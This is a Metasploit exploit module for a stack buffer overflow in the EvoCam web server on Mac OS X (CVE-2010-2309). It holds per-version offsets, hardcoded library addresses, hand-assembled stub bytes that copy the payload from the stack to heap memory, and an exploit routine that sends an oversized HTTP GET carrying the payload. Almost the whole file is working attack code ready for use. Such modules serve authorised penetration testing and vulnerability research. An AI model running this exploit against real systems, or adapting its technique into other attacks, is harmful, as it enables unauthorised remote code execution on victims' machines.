1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'MacOS X EvoCam HTTP GET Buffer Overflow',
16
        'Description' => %q{
17
          This module exploits a stack buffer overflow in the web server provided with the EvoCam
18
          program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload
19
          from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,
20
          3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.
21
        },
22
        'Author' => [
23
          'Paul Harrington', # Original Exploit Author and MSF Module
24
          'dookie', # MSF Module Assistance
25
        ],
26
        'Platform' => 'osx',
27
        'License' => MSF_LICENSE,
28
        'References' => [
29
          ['CVE', '2010-2309'],
30
          ['OSVDB', '65043'],
31
          ['EDB', '12835'],
32
        ],
33
        'Payload' => {
34
          'Space' => 300,
35
          'BadChars' => "\x00\xff\x09\x0a\x0b\x0c\x0c\x0d\x20",
36
          'StackAdjustment' => -3500,
37
        },
38
        'Privileged' => false,
39
        'Targets' => [
40
          [
41
            'Mac OS X 10.5.8 x86, EvoCam 3.6.6',
42
            {
43
              'Arch' => ARCH_X86,
44
              'Offset' => 1560,
45
              'Writable' => 0x8fe66448,
46
              'setjmp' => 0x8fe1cf38,
47
              'strdup' => 0x8fe210dc,
48
              'jmp_eax' => 0x8fe01041
49
            }
50
          ],
51
          [
52
            'Mac OS X 10.5.8 x86, EvoCam 3.6.7',
53
            {
54
              'Arch' => ARCH_X86,
55
              'Offset' => 1308,
56
              'Writable' => 0x8fe66448,
57
              'setjmp' => 0x8fe1cf38,
58
              'strdup' => 0x8fe210dc,
59
              'jmp_eax' => 0x8fe01041
60
            }
61
          ],
62

63
        ],
64
        'DisclosureDate' => '2010-06-01',
65
        'DefaultTarget' => 1,
66
        'Notes' => {
67
          'Reliability' => UNKNOWN_RELIABILITY,
68
          'Stability' => UNKNOWN_STABILITY,
69
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
70
        }
71
      )
72
    )
73

74
    register_options(
75
      [
76
        Opt::RPORT(8080),
77
      ]
78
    )
79
  end
80

81
  def make_exec_payload_from_heap_stub()
82
    frag0 =
83
      "\x90" + # nop
84
      "\x58" + # pop eax
85
      "\x61" + # popa
86
      "\xc3"   # ret
87

88
    frag1 =
89
      "\x90" +             # nop
90
      "\x58" +             # pop eax
91
      "\x89\xe0" +         # mov eax, esp
92
      "\x83\xc0\x0e" +     # add eax, byte +0xc
93
      "\x89\x44\x24\x08" + # mov [esp+0x8], eax
94
      "\xc3"               # ret
95

96
    setjmp = target['setjmp']
97
    writable = target['Writable']
98
    strdup = target['strdup']
99
    jmp_eax = target['jmp_eax']
100

101
    exec_payload_from_heap_stub =
102
      frag0 +
103
      [setjmp].pack('V') +
104
      [writable + 32, writable].pack("V2") +
105
      frag1 +
106
      "X" * 20 +
107
      [setjmp].pack('V') +
108
      [writable + 24, writable, strdup, jmp_eax].pack("V4") +
109
      "X" * 4
110
  end
111

112
  def exploit
113
    connect
114

115
    offset = target['Offset']
116

117
    buffer = "GET "
118
    buffer << rand_text_alpha_upper(offset)
119
    buffer << make_exec_payload_from_heap_stub()
120
    buffer << "\x90\x90"
121
    buffer << payload.encoded
122
    buffer << " HTTP/1.0\r\n\r\n"
123

124
    sock.put(buffer)
125
    sock.close
126

127
    handler()
128
    disconnect
129
  end
130
end
131

132